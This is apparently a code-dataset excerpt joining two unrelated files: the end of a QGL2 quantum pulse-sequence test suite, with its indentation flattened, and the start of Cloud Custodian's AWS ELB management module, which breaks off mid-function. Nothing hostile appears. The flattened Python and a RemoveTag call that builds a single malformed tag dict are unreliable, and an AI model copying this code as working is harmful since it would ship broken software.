seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRPhase(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1')
tR = QRegister('q2')
phases = np.linspace(0, pi/2, 11)
riseFall=40e-9
amp=1
length=100e-9
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for p in phases:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Barrier(controlQ, targetQ),
X90(targetQ),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for p in phases:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Barrier(controlQ, targetQ),
X90(targetQ),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRPhase",
(cR, tR, phases, riseFall, amp, length, calRepeats, canc_amp, canc_phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
class TestDecoupling(unittest.TestCase):
def setUp(self):
channel_setup()
def test_HahnEcho(self):
q = QubitFactory('q1')
qr = QRegister('q1')
steps = 11
pulseSpacings = np.linspace(0, 5e-6, steps)
periods = 0
calRepeats=2
expectedseq = []
for k in range(len(pulseSpacings)):
expectedseq += [
qwait(channels=(q,)),
X90(q),
Id(q, pulseSpacings[k]),
Y(q),
Id(q, pulseSpacings[k]),
U90(q, phase=2*pi*periods/len(pulseSpacings)*k),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Decoupling.py",
"HahnEcho",
(qr, pulseSpacings, periods, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
# import ipdb; ipdb.set_trace()
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_CPMG(self):
q = QubitFactory('q1')
qr = QRegister('q1')
# Create numPulses sequences
numPulses = [0, 2, 4, 6]
pulseSpacing = 500e-9
pulseSpacingDiff = pulseSpacing - q.pulse_params['length']
calRepeats = 2
def addt180t(q, pulseSpacingDiff, rep):
t180t = []
for _ in range(rep):
t180t += [
Id(q, pulseSpacingDiff/2),
Y(q),
Id(q, pulseSpacingDiff/2)
]
return t180t
expectedseq = []
for rep in numPulses:
expectedseq += [
qwait(channels=(q,)),
X90(q)
]
expectedseq += addt180t(q, pulseSpacingDiff, rep)
expectedseq += [
X90(q),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Decoupling.py",
"CPMG",
(qr, numPulses, pulseSpacing, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
class TestFeedback(unittest.TestCase):
def setUp(self):
channel_setup()
# FIXME: Add tests for these once implemented
#def test_Reset(self);
# ("Reset", (q1, np.linspace(0, 5e-6, 11), 0, 2), "Reset"),
#def test_BitFlip3(self);
# ("BitFlip3", (q1, [0, 2, 4, 6], 500e-9, 2), "BitFlip"),
class TestFlipFlop(unittest.TestCase):
def setUp(self):
channel_setup()
def test_FlipFlop(self):
qubit = QubitFactory('q1')
qr = QRegister('q1')
dragParamSweep = np.linspace(0, 1, 11)
maxNumFFs = 10
def addFFSeqs(dragParam, maxNumFFs, qubit):
ffs = []
for rep in range(maxNumFFs):
ffs += [
qwait(channels=(qubit,)),
X90(qubit, dragScaling=dragParam)
]
for _ in range(rep):
ffs += [
X90(qubit, dragScaling=dragParam),
X90m(qubit, dragScaling=dragParam)
]
ffs += [
Y90(qubit, dragScaling=dragParam),
MEAS(qubit)
]
return ffs
expectedseq = []
for dragParam in dragParamSweep:
expectedseq += [
qwait(channels=(qubit,)),
Id(qubit),
MEAS(qubit)
]
expectedseq += addFFSeqs(dragParam, maxNumFFs, qubit)
expectedseq += [
qwait(channels=(qubit,)),
X(qubit),
MEAS(qubit)
]
resFunction = compile_function("src/python/qgl2/basic_sequences/FlipFlop.py",
"FlipFlop",
(qr, dragParamSweep, maxNumFFs))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
# FIXME: Tests for this class are incomplete
class TestRB(unittest.TestCase):
def setUp(self):
channel_setup(doHW=True)
def test_SingleQubitRB(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
np.random.seed(20152606) # set seed for create_RB_seqs()
random.seed(20152606) # set seed for random.choice()
# Range below should be 1,7 but that takes too long; use 1,2 so it's quick
rbseqs = create_RB_seqs(1, 2**np.arange(1,2))
purity = True
add_cals = True
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testSingleQubitRB(qubit, rbseqs, purit=False, add_cal=True):
from QGL.Cliffords import clifford_seq
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
op = [Id(qubit, length=0), Y90m(qubit), X90(qubit)]
for ct in range(3 if purit else 1):
for seq in rbseqs:
seqsBis.append(reduce(operator.add, [clifford_seq(c, qubit)
for c in seq]))
#append tomography pulse to measure purity
seqsBis[-1].append(op[ct])
#append measurement
seqsBis[-1].append(MEAS(qubit))
#Tack on the calibration sequences
if add_cal:
seqsBis += create_cal_seqs((qubit, ), 2)
return seqsBis
expectedseq = testSingleQubitRB(q1, rbseqs, purity, add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20152606) # set seed for create_RB_seqs()
random.seed(20152606) # set seed for random.choice()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"SingleQubitRB",
(qr, rbseqs, purity, add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_TwoQubitRB(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
np.random.seed(20152606) # set seed for create_RB_seqs()
# Without this next seed, results differ run to run and QGL1 to QGL2
random.seed(20152606) # set seed for random.choice()
# Repeats below should be 16 but that takes too long; use 4 so it's quick
rbseqs = create_RB_seqs(2, [2, 4, 8, 16, 32], repeats=4)
add_cals = True
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testTwoQubitRB(q1, q2, rbseqs, add_cal=True):
from QGL.Cliffords import clifford_seq
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
for seq in rbseqs:
seqsBis.append(reduce(operator.add, [clifford_seq(c, q2, q1)
for c in seq]))
#Add the measurement to all sequences
for seq in seqsBis:
# FIXME: Correct thing is doing these with * as below,
# But that differs from QGL2 version
# seq.append(MEAS(q1) * MEAS(q2))
seq.append(MEAS(q1))
seq.append(MEAS(q2))
#Tack on the calibration sequences
if add_cal:
seqsBis += create_cal_seqs((q1, q2), 2)
return seqsBis
expectedseq = testTwoQubitRB(q1, q2, rbseqs, add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20152606) # set seed for create_RB_seqs()
# Without this next seed, results differ run to run and QGL1 to QGL2
random.seed(20152606) # set seed for random.choice()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"TwoQubitRB",
(qr1, qr2, rbseqs, add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
# Note that if you want to see the real sequence, don't do this
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
# Note: We expect the sequences to start differing around element 2110, due
# to PulseBlock vs list of pulses, given QGL2 uses Barrier;Pulse where QGL1 uses PulseBlock(pulse)
# (but that difference is harmless we think)
assertPulseSequenceEqual(self, seqs[:2110], expectedseq[:2110])
# assertPulseSequenceEqual(self, seqs, expectedseq)
def test_SingleQubitRB_AC(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
np.random.seed(20152606) # set seed for create_RB_seqs()
rbseqs = create_RB_seqs(1, 2**np.arange(1,7))
add_cals = True
purity = False
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testSingleQubitRB_AC(qubit, seqs, purit=False, add_cal=True):
from QGL.PulsePrimitives import AC, MEAS, Id, Y90m, X90
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
op = [Id(qubit, length=0), Y90m(qubit), X90(qubit)]
for ct in range(3 if purit else 1):
for seq in seqs:
seqsBis.append([AC(qubit, c) for c in seq])
# append tomography pulse to measure purity
seqsBis[-1].append(op[ct])
# append measurement
seqsBis[-1].append(MEAS(qubit))
# Tack on the calibration sequences
if add_cals:
seqsBis += create_cal_seqs((qubit, ), 2)
return seqsBis
expectedseq = testSingleQubitRB_AC(q1, rbseqs, purity, add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20152606) # set seed for create_RB_seqs()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"SingleQubitRB_AC",
(qr1, rbseqs, purity, add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
# Note that if you want to see the real sequence, don't do this
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_SimultaneousRB_AC(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
qr = QRegister(q1, q2)
np.random.seed(20151709) # set seed for create_RB_seqs()
rbseqs = create_RB_seqs(1, 2**np.arange(1,7))
add_cals = True
# Try copying in the basic QGL1 code
# Can't do it directly since that code doesn't return the
# sequence
# This isn't quite right; this is before adding the Waits for example
expectedseq = []
def testSimultaneousRB_AC(qubits, seqs, add_cal=True):
from QGL.PulsePrimitives import AC, MEAS
from QGL.BasicSequences.helpers import create_cal_seqs
from functools import reduce
import operator
seqsBis = []
for seq in zip(*seqs):
seqsBis.append([reduce(operator.__mul__,
[AC(q, c) for q, c in zip(qubits, pulseNums)])
for pulseNums in zip(*seq)])
# Add the measurement to all sequences
for seq in seqsBis:
seq.append(reduce(operator.mul, [MEAS(q) for q in qubits]))
# Tack on the calibration sequences
if add_cal:
seqsBis += create_cal_seqs((qubits), 2)
return seqsBis
expectedseq = testSimultaneousRB_AC((q1, q2), (rbseqs, rbseqs), add_cals)
# Must reset the seeds because QGL1 used the prior values, to ensure QGL2 gets same values
np.random.seed(20151709) # set seed for create_RB_seqs()
resFunction = compile_function("src/python/qgl2/basic_sequences/RB.py",
"SimultaneousRB_AC",
(qr, (rbseqs, rbseqs), add_cals))
seqs = resFunction()
seqs = testable_sequence(seqs)
# Run testable on the QGL1 to flatten the sequence of sequences
expectedseq = testable_sequence(expectedseq)
# QGL2 generates Barrier, P(q1), P(q2), Barrier, ....
# where QGL1 does PulseBlock(P(q1) * P(q2))
# - these are equivalent, but look different.
# I could go thru QGL2, when I find a Barrier, grab all next Pulses up to next Barrier & put them in a PulseBlock?
# Here though, I take any PulseBlock in QGL1 and just list the Pulses
expectedseq = flattenPulseBlocks(expectedseq)
# Strip out the QGL2 Waits and Barriers that QGL1 doesn't have
# Note that if you want to see the real sequence, don't do this
seqs = stripWaitBarrier(seqs)
# self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expectedseq)
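    # Illustrative equivalence (hypothetical pulses): for simultaneous pulses
    # QGL2 emits
    #   Barrier(q1, q2), AC(q1, c1), AC(q2, c2)
    # where QGL1 wraps them in a PulseBlock:
    #   PulseBlock(AC(q1, c1) * AC(q2, c2))
    # flattenPulseBlocks and stripWaitBarrier reduce both to a comparable form.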
# These RB functions are unlikely to be done:
# SingleQubitRB_DiAC (?)
# SingleQubitIRB_AC (needs a file of sequences that I don't have)
# Not this one that needs a specific file: SingleQubitRBT
class TestRabi(unittest.TestCase):
def setUp(self):
channel_setup()
def test_RabiAmp(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
amps = np.linspace(0, 1, 11)
phase = 0
expectedseq = []
for amp in amps:
expectedseq += [
qwait(channels=(q1,)),
Utheta(q1, amp=amp, phase=phase),
MEAS(q1)
]
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiAmp",
(qr, amps, phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
# Note that QGL2 gives a warning printing the tanh function; harmless
def test_RabiWidth(self):
from QGL.PulseShapes import tanh
q1 = QubitFactory('q1')
qr = QRegister(q1)
widths = np.linspace(0, 5e-6, 11)
amp=1
phase=0
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiWidth",
(qr, widths, amp, phase, tanh))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = []
for l in widths:
expectedseq += [
qwait(channels=(q1,)),
Utheta(q1, length=l, amp=amp, phase=phase, shape_fun=tanh),
MEAS(q1)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_RabiAmpPi(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr1 = QRegister(q1)
qr2 = QRegister(q2)
amps = np.linspace(0, 1, 11)
phase=0
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiAmpPi",
(qr1, qr2, amps, phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = []
for amp in amps:
expectedseq += [
qwait(channels=(q1,q2)),
X(q2),
Utheta(q1, amp=amp, phase=phase),
X(q2),
MEAS(q2)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_SingleShot(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"SingleShot",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = [
qwait(channels=(q1,)),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
X(q1),
MEAS(q1)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_PulsedSpec(self):
q1 = QubitFactory('q1')
qr = QRegister(q1)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"PulsedSpec",
(qr, True))
seqs = resFunction()
seqs = testable_sequence(seqs)
expectedseq = [
qwait(channels=(q1,)),
X(q1),
MEAS(q1)
]
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_RabiAmp_NQubits(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
qr = QRegister(q1, q2)
amps = np.linspace(0, 5e-6, 11)
p = 0
docals = False
calRepeats = 2
expectedseq = []
for a in amps:
expectedseq += [
qwait(channels=(q1,q2)),
Utheta(q1, amp=a, phase=p),
Utheta(q2, amp=a, phase=p),
Barrier(q1, q2),
MEAS(q1),
MEAS(q2)
]
if docals:
# Add calibration
cal_seqs = get_cal_seqs_2qubits(q1, q2, calRepeats)
expectedseq += cal_seqs
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"RabiAmp_NQubits",
(qr, amps, p, None, docals, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
# Note this is not a QGL1 basic sequence any longer
def test_Swap(self):
q = QubitFactory('q1')
mq = QubitFactory('q2')
qr = QRegister(q)
mqr = QRegister(mq)
delays = np.linspace(0, 5e-6, 11)
expectedseq = []
for d in delays:
expectedseq += [
qwait(channels=(q, mq)),
X(q),
X(mq),
Id(mq, length=d),
Barrier(q, mq),
MEAS(q),
MEAS(mq)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(q, mq, 2)
expectedseq += cal_seqs
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/Rabi.py",
"Swap",
(qr, delays, mqr))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
class TestSPAM(unittest.TestCase):
def setUp(self):
channel_setup()
def test_SPAM(self):
q = QubitFactory('q1')
qr = QRegister('q1')
angleSweep = np.linspace(0, pi/2, 11)
maxSpamBlocks=10
expectedseq = []
def spam_seqs(angle, q, maxSpamBlocks):
thisseq = []
for rep in range(maxSpamBlocks):
thisseq += [
qwait(channels=(q,)),
Y90(q)
]
innerseq = []
for _ in range(rep):
innerseq += [
X(q),
U(q, phase=pi/2+angle),
X(q),
U(q, phase=pi/2+angle)
]
thisseq += innerseq
thisseq += [
X90(q),
MEAS(q)
]
return thisseq
for angle in angleSweep:
expectedseq += [
qwait(channels=(q,)),
Id(q),
MEAS(q)
]
expectedseq += spam_seqs(angle, q, maxSpamBlocks)
expectedseq += [
qwait(channels=(q,)),
X(q),
MEAS(q)
]
resFunction = compile_function("src/python/qgl2/basic_sequences/SPAM.py",
"SPAM",
(qr, angleSweep, maxSpamBlocks))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
class TestT1T2(unittest.TestCase):
def setUp(self):
channel_setup()
def test_InversionRecovery(self):
q = QubitFactory('q1')
qr = QRegister('q1')
delays = np.linspace(0, 5e-6, 11)
calRepeats = 2
expectedseq = []
for d in delays:
expectedseq += [
qwait(channels=(q,)),
X(q),
Id(q, d),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/T1T2.py",
"InversionRecovery",
(qr, delays, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
def test_Ramsey(self):
q = QubitFactory('q1')
qr = QRegister('q1')
delays = np.arange(100e-9, 10e-6, 100e-9)
TPPIFreq = 1e6
calRepeats = 2
expectedseq = []
# Create the phases for the TPPI
phases = 2*pi*TPPIFreq*delays
# Create the basic Ramsey sequence
for d,phase in zip(delays, phases):
expectedseq += [
qwait(channels=(q,)),
X90(q),
Id(q, d),
U90(q, phase=phase),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
resFunction = compile_function("src/python/qgl2/basic_sequences/T1T2.py",
"Ramsey",
(qr, delays, TPPIFreq, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expectedseq)
if __name__ == '__main__':
# To test everything in this file (say, using cProfile)
# unittest.main("test.test_basic_mins")
# To run just 1 test from this file, try something like:
# unittest.main("test.test_basic_mins", "TestCR.test_PiRabi")
unittest.main("test.test_basic_mins", "TestAllXY.test_AllXY")
|
BBN-Q/pyqgl2
|
test/test_basic_mins.py
|
Python
|
apache-2.0
| 34,859 | 0.004131 |
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Elastic Load Balancers
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from concurrent.futures import as_completed
import logging
import re
from botocore.exceptions import ClientError
from c7n.actions import ActionRegistry, BaseAction, ModifyVpcSecurityGroupsAction
from c7n.filters import (
Filter, FilterRegistry, FilterValidationError, DefaultVpcBase, ValueFilter,
ShieldMetrics)
import c7n.filters.vpc as net_filters
from datetime import datetime
from dateutil.tz import tzutc
from c7n import tags
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource
from c7n.utils import local_session, chunks, type_schema, get_retry, worker
from c7n.resources.shield import IsShieldProtected, SetShieldProtection
log = logging.getLogger('custodian.elb')
filters = FilterRegistry('elb.filters')
actions = ActionRegistry('elb.actions')
actions.register('set-shield', SetShieldProtection)
filters.register('tag-count', tags.TagCountFilter)
filters.register('marked-for-op', tags.TagActionFilter)
filters.register('shield-enabled', IsShieldProtected)
filters.register('shield-metrics', ShieldMetrics)
@resources.register('elb')
class ELB(QueryResourceManager):
class resource_type(object):
service = 'elb'
type = 'loadbalancer'
enum_spec = ('describe_load_balancers',
'LoadBalancerDescriptions', None)
detail_spec = None
id = 'LoadBalancerName'
filter_name = 'LoadBalancerNames'
filter_type = 'list'
name = 'DNSName'
date = 'CreatedTime'
dimension = 'LoadBalancerName'
config_type = "AWS::ElasticLoadBalancing::LoadBalancer"
default_report_fields = (
'LoadBalancerName',
'DNSName',
'VPCId',
'count:Instances',
'list:ListenerDescriptions[].Listener.LoadBalancerPort')
filter_registry = filters
action_registry = actions
retry = staticmethod(get_retry(('Throttling',)))
@classmethod
def get_permissions(cls):
return ('elasticloadbalancing:DescribeLoadBalancers',
'elasticloadbalancing:DescribeLoadBalancerAttributes',
'elasticloadbalancing:DescribeTags')
def get_arn(self, r):
return "arn:aws:elasticloadbalancing:%s:%s:loadbalancer/%s" % (
self.config.region,
self.config.account_id,
r[self.resource_type.id])
def get_source(self, source_type):
if source_type == 'describe':
return DescribeELB(self)
return super(ELB, self).get_source(source_type)
class DescribeELB(DescribeSource):
def augment(self, resources):
_elb_tags(
resources,
self.manager.session_factory,
self.manager.executor_factory,
self.manager.retry)
return resources
def _elb_tags(elbs, session_factory, executor_factory, retry):
def process_tags(elb_set):
client = local_session(session_factory).client('elb')
elb_map = {elb['LoadBalancerName']: elb for elb in elb_set}
while True:
try:
results = retry(
client.describe_tags,
LoadBalancerNames=list(elb_map.keys()))
break
except ClientError as e:
if e.response['Error']['Code'] != 'LoadBalancerNotFound':
raise
msg = e.response['Error']['Message']
_, lb_name = msg.strip().rsplit(' ', 1)
elb_map.pop(lb_name)
if not elb_map:
results = {'TagDescriptions': []}
break
continue
for tag_desc in results['TagDescriptions']:
elb_map[tag_desc['LoadBalancerName']]['Tags'] = tag_desc['Tags']
with executor_factory(max_workers=2) as w:
list(w.map(process_tags, chunks(elbs, 20)))
@actions.register('mark-for-op')
class TagDelayedAction(tags.TagDelayedAction):
"""Action to specify an action to occur at a later date
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- "tag:custodian_cleanup": absent
- Instances: []
actions:
- type: mark-for-op
tag: custodian_cleanup
msg: "Unused ELB - No Instances: {op}@{action_date}"
op: delete
days: 7
"""
batch_size = 1
permissions = ('elasticloadbalancing:AddTags',)
def process_resource_set(self, resource_set, tags):
client = local_session(self.manager.session_factory).client('elb')
client.add_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=tags)
@actions.register('tag')
class Tag(tags.Tag):
"""Action to add tag(s) to ELB(s)
:example:
.. code-block:: yaml
policies:
- name: elb-add-owner-tag
resource: elb
filters:
- "tag:OwnerName": missing
actions:
- type: tag
key: OwnerName
value: OwnerName
"""
batch_size = 1
permissions = ('elasticloadbalancing:AddTags',)
def process_resource_set(self, resource_set, tags):
client = local_session(
self.manager.session_factory).client('elb')
client.add_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=tags)
@actions.register('remove-tag')
class RemoveTag(tags.RemoveTag):
"""Action to remove tag(s) from ELB(s)
:example:
.. code-block:: yaml
policies:
- name: elb-remove-old-tag
resource: elb
filters:
- "tag:OldTagKey": present
actions:
- type: remove-tag
tags: [OldTagKey1, OldTagKey2]
"""
batch_size = 1
permissions = ('elasticloadbalancing:RemoveTags',)
def process_resource_set(self, resource_set, tag_keys):
client = local_session(
self.manager.session_factory).client('elb')
client.remove_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=[{'Key': k for k in tag_keys}])
@actions.register('delete')
class Delete(BaseAction):
"""Action to delete ELB(s)
It is recommended to apply a filter to the delete policy to avoid unwanted
deletion of any load balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- Instances: []
actions:
- delete
"""
schema = type_schema('delete')
permissions = ('elasticloadbalancing:DeleteLoadBalancer',)
def process(self, load_balancers):
with self.executor_factory(max_workers=2) as w:
list(w.map(self.process_elb, load_balancers))
def process_elb(self, elb):
client = local_session(self.manager.session_factory).client('elb')
self.manager.retry(
client.delete_load_balancer,
LoadBalancerName=elb['LoadBalancerName'])
@actions.register('set-ssl-listener-policy')
class SetSslListenerPolicy(BaseAction):
"""Action to set the ELB SSL listener policy
:example:
.. code-block:: yaml
policies:
- name: elb-set-listener-policy
resource: elb
actions:
- type: set-ssl-listener-policy
name: SSLNegotiation-Policy-01
attributes:
- Protocol-SSLv3
- Protocol-TLSv1.1
- DHE-RSA-AES256-SHA256
"""
schema = type_schema(
'set-ssl-listener-policy',
name={'type': 'string'},
attributes={'type': 'array', 'items': {'type': 'string'}},
required=['name', 'attributes'])
permissions = (
'elasticloadbalancing:CreateLoadBalancerPolicy',
'elasticloadbalancing:SetLoadBalancerPoliciesOfListener')
def process(self, load_balancers):
with self.executor_factory(max_workers=3) as w:
list(w.map(self.process_elb, load_balancers))
@worker
def process_elb(self, elb):
if not is_ssl(elb):
return
client = local_session(self.manager.session_factory).client('elb')
        # Create a custom policy name suffixed with an epoch timestamp
        # to make it unique within the set of policies
        # for this load balancer.
policy_name = self.data.get('name') + '-' + \
str(int(datetime.now(tz=tzutc()).strftime("%s")) * 1000)
lb_name = elb['LoadBalancerName']
attrs = self.data.get('attributes')
policy_attributes = [{'AttributeName': attr, 'AttributeValue': 'true'}
for attr in attrs]
try:
client.create_load_balancer_policy(
LoadBalancerName=lb_name,
PolicyName=policy_name,
PolicyTypeName='SSLNegotiationPolicyType',
PolicyAttributes=policy_attributes)
except ClientError as e:
if e.response['Error']['Code'] not in (
'DuplicatePolicyName', 'DuplicatePolicyNameException',
'DuplicationPolicyNameException'):
raise
# Apply it to all SSL listeners.
ssl_policies = ()
if 'c7n.ssl-policies' in elb:
ssl_policies = elb['c7n.ssl-policies']
for ld in elb['ListenerDescriptions']:
if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
policy_names = [policy_name]
# Preserve extant non-ssl listener policies
policy_names.extend(ld.get('PolicyNames', ()))
# Remove extant ssl listener policy
if ssl_policies:
policy_names = list(set(policy_names).difference(ssl_policies))
client.set_load_balancer_policies_of_listener(
LoadBalancerName=lb_name,
LoadBalancerPort=ld['Listener']['LoadBalancerPort'],
PolicyNames=policy_names)
@actions.register('modify-security-groups')
class ELBModifyVpcSecurityGroups(ModifyVpcSecurityGroupsAction):
"""Modify VPC security groups on an ELB."""
permissions = ('elasticloadbalancing:ApplySecurityGroupsToLoadBalancer',)
def process(self, load_balancers):
client = local_session(self.manager.session_factory).client('elb')
groups = super(ELBModifyVpcSecurityGroups, self).get_groups(
load_balancers, 'SecurityGroups')
for idx, l in enumerate(load_balancers):
client.apply_security_groups_to_load_balancer(
LoadBalancerName=l['LoadBalancerName'],
SecurityGroups=groups[idx])
@actions.register('enable-s3-logging')
class EnableS3Logging(BaseAction):
"""Action to enable S3 logging for Elastic Load Balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-test
                resource: elb
filters:
- type: is-not-logging
actions:
- type: enable-s3-logging
bucket: elblogtest
prefix: dahlogs
emit_interval: 5
"""
schema = type_schema('enable-s3-logging',
bucket={'type': 'string'},
prefix={'type': 'string'},
emit_interval={'type': 'integer'},
)
permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)
def process(self, resources):
client = local_session(self.manager.session_factory).client('elb')
for elb in resources:
elb_name = elb['LoadBalancerName']
            log_attrs = {'Enabled': True}
if 'bucket' in self.data:
log_attrs['S3BucketName'] = self.data['bucket']
if 'prefix' in self.data:
log_attrs['S3BucketPrefix'] = self.data['prefix']
if 'emit_interval' in self.data:
log_attrs['EmitInterval'] = self.data['emit_interval']
client.modify_load_balancer_attributes(LoadBalancerName=elb_name,
LoadBalancerAttributes={
'AccessLog': log_attrs
})
return resources
@actions.register('disable-s3-logging')
class DisableS3Logging(BaseAction):
"""Disable s3 logging for ElasticLoadBalancers.
:example:
.. code-block:: yaml
policies:
- name: turn-off-elb-logs
resource: elb
filters:
- type: is-logging
bucket: prodbucket
actions:
                  - type: disable-s3-logging
"""
schema = type_schema('disable-s3-logging')
permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)
def process(self, resources):
client = local_session(self.manager.session_factory).client('elb')
for elb in resources:
elb_name = elb['LoadBalancerName']
